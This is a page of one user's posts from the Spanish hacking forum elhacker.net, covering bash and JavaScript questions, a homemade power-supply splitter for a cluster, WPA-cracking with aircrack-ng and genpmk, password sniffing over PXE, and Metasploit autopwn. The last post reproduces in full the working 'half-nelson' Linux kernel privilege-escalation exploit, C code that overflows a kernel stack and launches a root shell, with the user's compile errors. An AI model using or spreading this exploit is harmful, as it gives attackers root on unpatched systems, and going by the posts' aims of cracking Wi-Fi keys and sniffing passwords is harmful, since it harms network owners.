elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Temas
Páginas: 1 2 [3] 4 5 6 7 8 9
21  Programación / Scripting / [Bash] Abrir comando en otra pestaña de la shell (Solucionado) en: 29 Febrero 2012, 15:29 pm
Hola.

Hace un tiempo hice un script el cual podía ejecutar un comando para que se abriera en otra shell.
Pues bien, ahora quería saber si se puede hacer lo mismo pero abriendo otra pestaña en cada comando que yo utilice.

Este es el código que utilizaba para abrir nuevas shells:

Código:
gnome-terminal -x bash -c "ls /root" & ;;

Entonces este abrirá una nueva shell con el resultado de "ls /root". Lo que busco yo es que al hacerle esto me abra una nueva shell y en esa shell yo puede abrirle mas pestañas con diferentes comandos.

Se puede?
22  Programación / Scripting / [Bash] Recortar nombre de archivos de una salida del comando ls (Solucionado) en: 22 Febrero 2012, 15:35 pm
Hola.

Estoy intentando guardar los nombres de los archivos de una carpeta, haciendo un $ls <ruta carpeta>, en variables para luego utilizarlos.

Los nombres de los archivos tienen que ser sin extensión.

He estado probando pero no me aclaro, copie un código y fui modificando-lo hasta conseguir algo parecido a lo que pretendía tener, pero no lo consigo del todo.

El trozo de código es este:
Código:
#!/bin/bash
ruta=$(ls /home/moikano/Escritorio/ejerciciscript/videos/)
base="${ruta%%.*}"
ruta="${ruta##.*}"
ruta="${ruta%.*}"
base2="${ruta##.*}"
echo $base $base2

La salida del código es:
Código:
capitul2 capitul2.avi capitul

La salida que yo quisiera tener:
Citar
capitul2 capitul

Esto es lo máximo que he podido sacar, supongo que al final valdrá únicamente si hay 2 archivos, es decir, si la carpeta contiene mas de 2 archivos el script ( cuando este acabado y funcionando) no funcionará como debe ya que solo cojera 2 nombres de archivos.

Por si acaso os pongo la salida del comando:
Código:
 $ls /home/moikano/Escritorio/ejerciciscript/videos/
Es:
Código:
 capitul2.avi capitul.avi


Y si alguien pudiera remitirme a un manual o tutorial donde explicarán como se usan los parámetros ${variable%%.*} para modificar cadenas se lo agradecería.
23  Programación / Desarrollo Web / [javascript] Enviarme un correo a mi mismo con el contenido de una variable en: 21 Febrero 2012, 23:35 pm
Hola.

Estoy empezando con javascript, (no se si esto va aquí o en scripting, creo que aquí) y se me plantea una duda, según he leído por ahí con javascript no se pueden enviar correos, pero en otras páginas escriben códigos con los que si se pueden pero combinando con html.

Ahora bien, mi pregunta es....  puede poner una ventana de introducción de datos para guardar los datos introducidos y luego enviármelos por correo ya sea por javascript o por html?

Algo parecido a esto:

Código
  1.  
  2. <script language="javascript" type="text/javascript">
  3. var usuario
  4. usuario = prompt('Introduce el usuario',' ')
  5. usuario = mailto:ejemplo@ejemplo.com
  6. </script>

Por supuesto esto no serviría, pero es por poner un ejemplo práctico.

Gracias de antemano.
24  Seguridad Informática / Hacking / [Sniffing] Esnifar las contraseñas de ordenadores conectados por PXE en: 18 Enero 2012, 01:07 am
Se podría esnifar las contraseñas del protocolo PXE?

En un principio creo que no, porque el PXE solo inicia la conexión entre el servidor y cliente para que el servidor le envíe los datos al cliente para poder conectarse a el, y supongo que una vez cargados los paquetes para poder loguearse ya va todo cifrado y con claves RSA.

Bueno no se, y por eso mismo pregunto.

Lo probaré con dsniff y ethercap.

Si alguien lo ha probado que me saque de dudas.
25  Informática / Electrónica / Splitter para conectar 2 placas a una fuente, casero. en: 13 Enero 2012, 15:20 pm

Introducción

Hace unas semanas que estoy pensando que hacer con mis placas base viejas, fuentes, discos duros,...
Así que decidí hacer un cluster, mas que nada por aprender y darles una oportunidad a estos materiales de volver a ser útiles.

Uno de los problemas que se me plateaba es que, aparte de que tengo mas fuentes de alimentación que placas, el consumo de este cluster iba a ser alta, ya que por cada placa se debería usar una fuente.

Por esa misma razon decicí intentar conectar 2 placas base con una fuente y así reducir a la mitad el uso de fuentes de alimentación ( mas adelante igual me planteo el intentarlo con 3 placas a una fuente).





Comprar uno hecho

Está opción es totalmente valida, ya que hay muchos splitters por la red en tiendas de informática e electrónica. No son nada caros, 15 $ o por ahí.





Haciendolo casero

Si decidimos crearlo nosotros y ahorrarnos dinero (muy poco dinero) o simplemente aprovechar materiales sin un uso útil y fomentar la reutilización (la mejor forma de reciclar) de componentes, entonces sigue leyendo.





Preparandonos

Necesitaremos los siguientes materiales:

1- Conector hembra ATX 20  (o 24 según el tipo de placa y fuente que queramos splittear) sacado de una placa base vieja o rota.
2- Conectores macho ATX sacados de dos fuentes de alimentación rotas.
-Estaño para soldar.
-Tubitos termoretráctiles para los cables.

Necesitaremos las siguientes herramientas:

1-Desoldador de estaño, ya sea de pera, de válvula o eléctrico,...
1-Soldador de estaño, la potencia la dejo a tu habilidad, yo use uno de 30w.
1-Pinzas de soldadura, las que mas os gusten para facilitar el trabajo.





Pasos a seguir para el montaje

1- Desoldaremos el conector hembra de la placa base usando el desoldador. Hay que tener paciencia si las soldaduras no se limpian de estaño facilmente, ya que son 20 y costará que todas estén limpias para que al despegar el conector salgan todas bien.

2- Desmontamos la fuente de alimentación hasta llegar a la placa. Una vez en la placa cortaremos con unos alicates los cables del conector macho que van soldados a la placa, también se pueden desoldar, eso cada uno como lo prefiera.

3- Soldaremos los cables de los dos conectores macho, fijándonos bien en los colores y las posiciones de los cables, ya que deben coincidir. Cuando estén soldados se pueden comprobar con un multímetro (la opción de conexión por sonido o luz) para ver que las conexiones están bien hechas.

4- Soldaremos los cables juntos de los dos conectores machos a los pines del conector hembra. Fijándonos bien de que coinciden los colores de los cables con la posición. Aquí añadiremos el tubo termoretráctil en cada cable para evitar conexiones indeseadas.

5- Finalmente le añadiremos unas bridas para que se lien menos los cables.
Comprobaremos con el multímetro que las conexiones del conector hembra llegan a los dos machos correctamente y luego una vez conectado a la fuente comprobaremos que los voltajes son los correctos en los dos conectores.

Mas o menos debería quedar como en esta foto.




Tengo un PDF creado por mi con los pasos explicados con fotos, si a alguien le interesa solo tiene que pedirlo.

Se aceptan criticas, tanto positivas como negativas, así como mejoras, comentarios,... todo ello es bienvenido.



Por cierto, todo esto viene de una pregunta que formule en otro hilo del foro ( en el de hardware) , os dejo un enlace por si queréis echarle un vistazo.

http://foro.elhacker.net/hardware/fuente_alimentacion_conectar_dos_o_mas_placas_base_en_la_misma_fuente-t349242.0.html



26  Seguridad Informática / Hacking Wireless / Pido consejo para montar un cluster exclusivo para aircrack-ng en: 2 Enero 2012, 20:24 pm
Hola

Estoy intentando montar un cluster de varios ordenadores viejos para que puedan trabajar al unisono para un calculo mas rápido en la obtención de contraseñas WPA.

Como he leído por la red que hay varios tipos  de clusters recurro a este subforo para ver si alguien ya ha hecho esto mismo y puede aconsejarme que tipo de cluster busco para montar, con que SO en los nodos, con que SO en el server.

De momento me decanto por openmosix y los nodos sin disco duro, que se conecten por PXE al servidor.

Gracias de antemano.
27  Informática / Hardware / [Fuente alimentación] Conectar dos o mas placas base en la misma fuente en: 2 Enero 2012, 20:19 pm
Estoy intentando recopilar información para montar un pequeño cluster con varios ordenadores.

Ahora mismo estoy con lo primero, el hardware y pensando un poco en la cantidad de energía que pueden utilizar 4 fuentes de alimentación ( para 4 nodos del cluster) es demasiada para el uso que le voy a dar al cluster.

Mirando por google encontré en la página web de bulma (http://bulma.net/body.phtml?nIdNoticia=1708
) que habían creado un cluster y una de las cosas que tenían en cuenta era esto mismo. Es un poco viejo el post, del 2003, pero eso no debe de haber cambiado mucho.

Os dejo una foto de lo que hicieron con las fuentes de alimentación.



Bien, yo ahí veo que tienen como una plaquita para doblar la señal. Alguien podría decirme si eso eso cierto y como puedo conseguir algo así?

De no poder conseguir la placa o se difícil de encontrar podría soldar varios conectores ATX en uno? siempre y cuando controlara el voltaje consumido por todas las placas a la vez.

Gracias de antemano

28  Seguridad Informática / Hacking / [Backtrack 5] Problemas con el metasploit y autopwn desde la ultima atualización en: 23 Noviembre 2011, 15:12 pm
Hola

El otro día actualice el metasploit con el msfupdate, me pareció que actualizó correctamente, pero hoy, al intentar hacer un ataque por base de datos y utilizar el autopown para enviar los exploits al host me encuentro con que el autopown no existe.


Es decir, mi salida de "help" en la consola de metasloit no me muestra el comando "db_autopwn" y pruebo a ponerlo y me dice que el comando no existe.

Esto me a ocurrido con 2 equipos diferentes al actualizar a la última versión.

Que puede haber sido?

Gracias de antemano

PD: Por lo que he leído se ve que han quitado el "autopwn" en la última versión, porque estaba desatendido y además podía dar problemas en el sistema cuando estaba en "default mode", que era siempre que no se configurará claro.

Alguien sabe si se puede activar?
29  Seguridad Informática / Hacking Wireless / [genpmk] No me crea el diccionario precomputado, error too large en: 16 Noviembre 2011, 23:11 pm
Hola

Estoy intentando precomputar un diccionario de 2,6 Gb con el gepmk para usarlo con el cowpatty, pero me escribe el siguiente error al poner el siguiente comando:

Citar
root@brutus:/home/brutus/diccionarios# genpmk -f Diccionarios-WPA.info.dic -d precomputados/wlan_aaa0_WPA -s WLAN_AAA0
genpmk 1.1 - WPA-PSK precomputation attack. <jwright@hasborg.com>
fopen: Value too large for defined data type

Sabéis si el genpmk tiene un tamaño concreto que puede precomputar, o es otro tipo de errror?

Gracias de antemano.

PD: Podría ser que no me quedara espacio en el disco duro? Necesita mas espacio para crear el diccionario precomputado que el diccionario de palabras?
30  Seguridad Informática / Bugs y Exploits / [Exploit] me sale errror al intentar compilar el exploit half-nelson en: 12 Noviembre 2011, 18:13 pm
Hola

Nuevamente estoy intentando compilar un exploit llamado half-nelson, es el siguiente código:

Código:
/*
 * half-nelson.c
 *
 * Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3848
 *
 *   Stack-based buffer overflow in the econet_sendmsg function in
 *   net/econet/af_econet.c in the Linux kernel before 2.6.36.2, when an
 *   econet address is configured, allows local users to gain privileges by
 *   providing a large number of iovec structures.
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3850
 *
 *   The ec_dev_ioctl function in net/econet/af_econet.c in the Linux kernel
 *   before 2.6.36.2 does not require the CAP_NET_ADMIN capability, which
 *   allows local users to bypass intended access restrictions and configure
 *   econet addresses via an SIOCSIFADDR ioctl call.
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4073
 *
 *   The ipc subsystem in the Linux kernel before 2.6.37-rc1 does not
 *   initialize certain structures, which allows local users to obtain
 *   potentially sensitive information from kernel stack memory.
 *
 * Usage:
 *
 *   $ gcc half-nelson.c -o half-nelson -lrt
 *   $ ./half-nelson
 *   [+] looking for symbols...
 *   [+] resolved symbol commit_creds to 0xffffffff81088ad0
 *   [+] resolved symbol prepare_kernel_cred to 0xffffffff81088eb0
 *   [+] resolved symbol ia32_sysret to 0xffffffff81046692
 *   [+] spawning children to achieve adjacent kstacks...
 *   [+] found parent kstack at 0xffff88001c6ca000
 *   [+] found adjacent children kstacks at 0xffff88000d10a000 and 0xffff88000d10c000
 *   [+] lower child spawning a helper...
 *   [+] lower child calling compat_sys_wait4 on helper...
 *   [+] helper going to sleep...
 *   [+] upper child triggering stack overflow...
 *   [+] helper woke up
 *   [+] lower child returned from compat_sys_wait4
 *   [+] parent's restart_block has been clobbered
 *   [+] escalating privileges...
 *   [+] launching root shell!
 *   # id
 *   uid=0(root) gid=0(root)
 *
 * Notes:
 *
 *   This exploit leverages three vulnerabilities to escalate privileges.
 *   The primary vulnerability is a kernel stack overflow, not a stack buffer
 *   overflow as the CVE description incorrectly states. I believe this is the
 *   first public exploit for a kernel stack overflow, and it turns out to be
 *   a bit tricky due to some particulars of the econet vulnerability. A full
 *   breakdown of the exploit is forthcoming.
 *
 *   Tested on Ubuntu 10.04 LTS (2.6.32-21-generic).
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <syscall.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/syscall.h>
#include <netinet/in.h>
#include <net/if.h>
 
#define IOVS           446
#define NPROC          1024
#define KSTACK_SIZE    8192
 
#define KSTACK_UNINIT  0
#define KSTACK_UPPER   1
#define KSTACK_LOWER   2
#define KSTACK_DIE     3
#define KSTACK_PARENT  4
#define KSTACK_CLOBBER 5
 
#define LEAK_BASE      0xffff880000000000
#define LEAK_TOP       0xffff8800c0000000
#define LEAK_DEPTH     500
#define LEAK_OFFSET    32
 
#define NR_IPC         0x75
#define NR_WAIT4       0x72
#define SEMCTL         0x3
 
#ifndef PF_ECONET
#define PF_ECONET      19
#endif
 
#define STACK_OFFSET   6
#define RESTART_OFFSET 40
 
struct ec_addr {
    unsigned char station;
    unsigned char net;
};
 
struct sockaddr_ec {
    unsigned short sec_family;
    unsigned char port;
    unsigned char cb;
    unsigned char type;
    struct ec_addr addr;
    unsigned long cookie;
};
 
struct ipc64_perm {
    uint32_t key;
    uint32_t uid;
    uint32_t gid;
    uint32_t cuid;
    uint32_t cgid;
    uint32_t mode;
    uint16_t seq;
    uint16_t __pad2;
    unsigned long __unused1;
    unsigned long __unused2;
};
 
struct semid64_ds {
    struct ipc64_perm sem_perm;
    unsigned long sem_otime;
    unsigned long __unused1;
    unsigned long sem_ctime;
    unsigned long __unused;
    unsigned long sem_nsems;
    unsigned long __unused3;
    unsigned long __unused4;
};
 
union semun {
    int val;
    struct semid_ds *buf;
    unsigned short *array;
    struct seminfo *__buf;
};
 
struct region {
    unsigned long parent;
    unsigned long addrs[NPROC];
};
struct region *region;
 
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long ia32_sysret;
  
void __attribute__((regparm(3)))
kernel_code(void)
{
    commit_creds(prepare_kernel_cred(0));
}
 
void
payload_parent(void)
{
    asm volatile (
        "mov $kernel_code, %rax\n"
        "call *%rax\n"
    );
}
 
void
payload_child(void)
{
    asm volatile (
        "movq $payload_parent, (%0)\n"
        "jmpq *%1\n"
        :
        : "r"(region->parent + RESTART_OFFSET), "r"(ia32_sysret)
    );
}
 
unsigned long
get_kstack(void)
{
    int i, size, offset;
    union semun *arg;
    struct semid_ds dummy;
    struct semid64_ds *leaked;
    char *stack_start, *stack_end;
    unsigned char *p;
    unsigned long kstack, *ptr;
 
    /* make sure our argument is 32-bit accessible */
    arg = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);
    if (arg == MAP_FAILED) {
        printf("[-] failure mapping memory, aborting!\n");
        exit(1);
    }
 
    /* map a fake stack to use during syscall */
    stack_start = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);
    if (stack_start == MAP_FAILED) {
        printf("[-] failure mapping memory, aborting!\n");
        exit(1);
    }
    stack_end = stack_start + 4096;
 
    memset(arg, 0, sizeof(union semun));
    memset(&dummy, 0, sizeof(struct semid_ds));
    arg->buf = &dummy;
 
    /* syscall(NR_IPC, SEMCTL, 0, 0, IPC_SET, arg) */
    asm volatile (
        "push %%rax\n"
        "push %%rbx\n"
        "push %%rcx\n"
        "push %%rdx\n"
        "push %%rsi\n"
        "push %%rdi\n"
        "movl %0, %%eax\n"
        "movl %1, %%ebx\n"
        "movl %2, %%ecx\n"
        "movl %3, %%edx\n"
        "movl %4, %%esi\n"
        "movq %5, %%rdi\n"
        "movq %%rsp, %%r8\n"
        "movq %6, %%rsp\n"
        "push %%r8\n"
        "int $0x80\n"
        "pop %%r8\n"
        "movq %%r8, %%rsp\n"
        "pop %%rdi\n"
        "pop %%rsi\n"
        "pop %%rdx\n"
        "pop %%rcx\n"
        "pop %%rbx\n"
        "pop %%rax\n"
        :
        : "r"(NR_IPC), "r"(SEMCTL), "r"(0), "r"(0), "r"(IPC_SET), "r"(arg), "r"(stack_end)
        : "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi", "r8"
    );
 
    /* naively extract a pointer to the kstack from the kstack */
    p = stack_end - (sizeof(unsigned long) + sizeof(struct semid64_ds)) + LEAK_OFFSET;
    kstack = *(unsigned long *) p;
 
    if (kstack < LEAK_BASE || kstack > LEAK_TOP) {
        printf("[-] failed to leak a suitable kstack address, try again!\n");
        exit(1);
    }
    if ((kstack % 0x1000) < (0x1000 - LEAK_DEPTH)) {
        printf("[-] failed to leak a suitable kstack address, try again!\n");
        exit(1);
    }
 
    kstack = kstack & ~0x1fff;
    
    return kstack;
}
 
unsigned long
get_symbol(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy, sym[512];
    int ret = 0;
  
    f = fopen("/proc/kallsyms", "r");
    if (!f) {
        return 0;
    }
  
    while (ret != EOF) {
        ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
        if (ret == 0) {
            fscanf(f, "%s\n", sym);
            continue;
        }
        if (!strcmp(name, sym)) {
            printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
            fclose(f);
            return addr;
        }
    }
    fclose(f);
  
    return 0;
}
 
int
get_adjacent_kstacks(void)
{
    int i, ret, shm, pid, type;
 
    /* create shared communication channel between parent and its children */
    shm = shm_open("/halfnelson", O_RDWR | O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO);
    if (shm < 0) {
        printf("[-] failed creating shared memory, aborting!\n");
        exit(1);
    }
 
    ret = ftruncate(shm, sizeof(struct region));
    if (ret != 0) {
        printf("[-] failed resizing shared memory, aborting!\n");
        exit(1);
    }
 
    region = mmap(NULL, sizeof(struct region), PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0);
    memset(region, KSTACK_UNINIT, sizeof(struct region));
 
    /* parent kstack self-discovery */
    region->parent = get_kstack();
 
    printf("[+] found parent kstack at 0x%lx\n", region->parent);
 
    /* fork and discover children with adjacently-allocated kernel stacks */
    for (i = 0; i < NPROC; ++i) {
        pid = fork();
 
        if (pid > 0) {
            type = KSTACK_PARENT;
            continue;
        } else if (pid == 0) {
            /* children do kstack self-discovery */
            region->addrs[i] = get_kstack();
 
            /* children sleep until parent has found adjacent children */
            while (1) {
                sleep(1);
                if (region->addrs[i] == KSTACK_DIE) {
                    /* parent doesn't need us :-( */
                    exit(0);
                } else if (region->addrs[i] == KSTACK_UPPER) {
                    /* we're the upper adjacent process */
                    type = KSTACK_UPPER;
                    break;
                } else if (region->addrs[i] == KSTACK_LOWER) {
                    /* we're the lower adjacent process */
                    type = KSTACK_LOWER;
                    break;
                }
            }
            break;
        } else {
            printf("[-] fork failed, aborting!\n");
            exit(1);
        }
    }
 
    return type;
}
 
void
do_parent(void)
{
    int i, j, upper, lower;
 
    /* parent sleeps until we've discovered all the child kstacks */
    while (1) {
        sleep(1);
        for (i = 0; i < NPROC; ++i) {
            if (region->addrs[i] == KSTACK_UNINIT) {
                break;
            }
        }
        if (i == NPROC) {
            break;
        }
    }
 
    /* figure out if we have any adjacent child kstacks */
    for (i = 0; i < NPROC; ++i) {
        for (j = 0; j < NPROC; ++j) {
            if (region->addrs[i] == region->addrs[j] + KSTACK_SIZE) {
                break;
            }
        }
        if (j != NPROC) {
            break;
        }
    }
    if (i == NPROC && j == NPROC) {
        printf("[-] failed to find adjacent kstacks, try again!\n");
        exit(1);
    }
 
    upper = i;
    lower = j;
 
    printf("[+] found adjacent children kstacks at 0x%lx and 0x%lx\n", region->addrs[lower], region->addrs[upper]);
 
    /* signal to non-adjacent children to die */
    for (i = 0; i < NPROC; ++i) {
        if (i != upper && i != lower) {
            region->addrs[i] = KSTACK_DIE;
        }
    }
 
    /* signal adjacent children to continue on */
    region->addrs[upper] = KSTACK_UPPER;
    region->addrs[lower] = KSTACK_LOWER;
 
    /* parent sleeps until child has clobbered the fptr */
    while (1) {
        sleep(1);
        if (region->parent == KSTACK_CLOBBER) {
            break;
        }
    }
 
    printf("[+] escalating privileges...\n");
 
    /* trigger our clobbered fptr */
    syscall(__NR_restart_syscall);
 
    /* our privileges should be escalated now */
    if (getuid() != 0) {
        printf("[-] privilege escalation failed, aborting!\n");
        exit(1);
    }
 
    printf("[+] launching root shell!\n");
 
    execl("/bin/sh", "/bin/sh", NULL);
}
 
void
do_child_upper(void)
{
    int i, ret, eco_sock;
    struct sockaddr_ec eco_addr;
    struct msghdr eco_msg;
    struct iovec iovs[IOVS];
    struct ifreq ifr;
    char *target;
 
    /* calculate payload target, skip prologue */
    target = (char *) payload_child;
    target += 4;
    
    /* give lower child a chance to enter its wait4 call */
    sleep(1);
 
    /* write some zeros */
    for (i = 0; i < STACK_OFFSET; ++i) {
        iovs[i].iov_base = (void *) 0x0;
        iovs[i].iov_len = 0;
    }
 
    /* overwrite saved ia32_sysret address on stack */
    iovs[STACK_OFFSET].iov_base = (void *) target;
    iovs[STACK_OFFSET].iov_len = 0x0246;
 
    /* force abort via EFAULT */
    for (i = STACK_OFFSET + 1; i < IOVS; ++i) {
        iovs[i].iov_base = (void *) 0xffffffff00000000;
        iovs[i].iov_len = 0;
    }
 
    /* create econet socket */
    eco_sock = socket(PF_ECONET, SOCK_DGRAM, 0);
    if (eco_sock < 0) {
        printf("[-] failed creating econet socket, aborting!\n");
        exit(1);
    }
 
    memset(&ifr, 0, sizeof(ifr));
    strcpy(ifr.ifr_name, "lo");
 
    /* trick econet into associated with the loopback */
    ret = ioctl(eco_sock, SIOCSIFADDR, &ifr);
    if (ret != 0) {
        printf("[-] failed setting interface address, aborting!\n");
        exit(1);
    }
 
    memset(&eco_addr, 0, sizeof(eco_addr));
    memset(&eco_msg, 0, sizeof(eco_msg));
    eco_msg.msg_name = &eco_addr;
    eco_msg.msg_namelen = sizeof(eco_addr);
    eco_msg.msg_flags = 0;
    eco_msg.msg_iov = &iovs[0];
    eco_msg.msg_iovlen = IOVS;
 
    printf("[+] upper child triggering stack overflow...\n");
 
    /* trigger the kstack overflow into lower child's kstack */
    ret = sendmsg(eco_sock, &eco_msg, 0);
    if (ret != -1 || errno != EFAULT) {
        printf("[-] sendmsg succeeded unexpectedly, aborting!\n");
        exit(1);
    }
 
    close(eco_sock);
}
 
void
do_child_lower(void)
{
    int pid;
 
    printf("[+] lower child spawning a helper...\n");
 
    /* fork off a helper to wait4 on */
    pid = fork();
    if (pid == 0) {
        printf("[+] helper going to sleep...\n");
        sleep(5);
        printf("[+] helper woke up\n");
        exit(1);
    }
 
    printf("[+] lower child calling compat_sys_wait4 on helper...\n");
 
    /* syscall(NR_WAIT4, pid, 0, 0, 0) */
    asm volatile (
        "push %%rax\n"
        "push %%rbx\n"
        "push %%rcx\n"
        "push %%rdx\n"
        "push %%rsi\n"
        "movl %0, %%eax\n"
        "movl %1, %%ebx\n"
        "movl %2, %%ecx\n"
        "movl %3, %%edx\n"
        "movl %4, %%esi\n"
        "int $0x80\n"
        "pop %%rsi\n"
        "pop %%rdx\n"
        "pop %%rcx\n"
        "pop %%rbx\n"
        "pop %%rax\n"
        :
        : "r"(NR_WAIT4), "r"(pid), "r"(0), "r"(0), "r"(0)
        : "memory", "rax", "rbx", "rcx", "rdx", "rsi"
    );
 
    printf("[+] lower child returned from compat_sys_wait4\n");
 
    printf("[+] parent's restart_block has been clobbered\n");
 
    /* signal parent that our fptr should now be clobbered */
    region->parent = KSTACK_CLOBBER;
}
 
int
main(int argc, char **argv)
{
    int type;
 
    if (sizeof(unsigned long) != 8) {
        printf("[-] x86_64 only, sorry!\n");
        exit(1);
    }
 
    printf("[+] looking for symbols...\n");
  
    commit_creds = (_commit_creds) get_symbol("commit_creds");
    if (!commit_creds) {
        printf("[-] symbol table not available, aborting!\n");
        exit(1);
    }
  
    prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
    if (!prepare_kernel_cred) {
        printf("[-] symbol table not available, aborting!\n");
        exit(1);
    }
 
    ia32_sysret = get_symbol("ia32_sysret");
    if (!ia32_sysret) {
        printf("[-] symbol table not available, aborting!\n");
        exit(1);
    }
 
    printf("[+] spawning children to achieve adjacent kstacks...\n");
 
    type = get_adjacent_kstacks();
 
    if (type == KSTACK_PARENT) {
        do_parent();
    } else if (type == KSTACK_UPPER) {
        do_child_upper();
    } else if (type == KSTACK_LOWER) {
        do_child_lower();
    }
 
    return 0;
}


Al poner el siguiente comando:  gcc half-nelson.c -o half-nelson -lrt

Me sale el siguiente error:

Citar
half-nelson.c: In function ‘get_kstack’:
half-nelson.c:265: warning: integer constant is too large for ‘long’ type
half-nelson.c:265: warning: integer constant is too large for ‘long’ type
half-nelson.c: In function ‘do_child_upper’:
half-nelson.c:475: warning: integer constant is too large for ‘long’ type
half-nelson.c: In function ‘get_kstack’:
half-nelson.c:231: error: unknown register name ‘r8’ in ‘asm’

No se ni que podría ser, gracias de antemano.


Páginas: 1 2 [3] 4 5 6 7 8 9
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines